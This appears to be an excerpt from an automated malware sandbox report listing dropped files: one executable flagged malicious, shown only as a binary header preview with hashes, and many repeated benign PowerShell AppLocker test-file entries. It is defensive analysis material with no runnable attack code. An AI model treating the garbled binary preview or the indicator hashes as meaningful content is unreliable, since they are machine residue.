                                                                                                                                                                                                                        SHA-512:F9DD3DBCDBD563E48AD059EF6CFE1BF3EA6E368F12A727B3BDC70883C11C4B02FD4EF0BC6A022815E778760557662CD1C8EDDAB7D91DED8C2EABEAE1FC5D7C5F
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........N...........@...........................O.......N...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...zrmackkh..*...$...)...$.............@...rcriyoua......N.......N.............@....taggant.0....N.."....N.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0344hjpu.xtt.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0skghz5l.gpm.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2puj3dvf.hay.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3mnkbap2.zpf.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5vlcirsy.sxs.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5z5za3zh.k1c.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ahrmvuau.3eo.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_apkko345.3oo.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bsb0spyh.e4o.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_detmx4jf.nd1.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ffuuqi5u.eyw.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hadsse0x.bba.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hexysyco.fwt.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ifq0ukqc.clm.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1tinmp3.fvy.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3vd4nml.l2c.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l3pjss1h.fgu.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lj1z3yob.5qn.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lmng3b42.voq.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qxbfkqah.q12.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1kji0s1.wl1.ps1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjmhjkgl.aj0.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_saqcloh3.ody.psm1

                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode

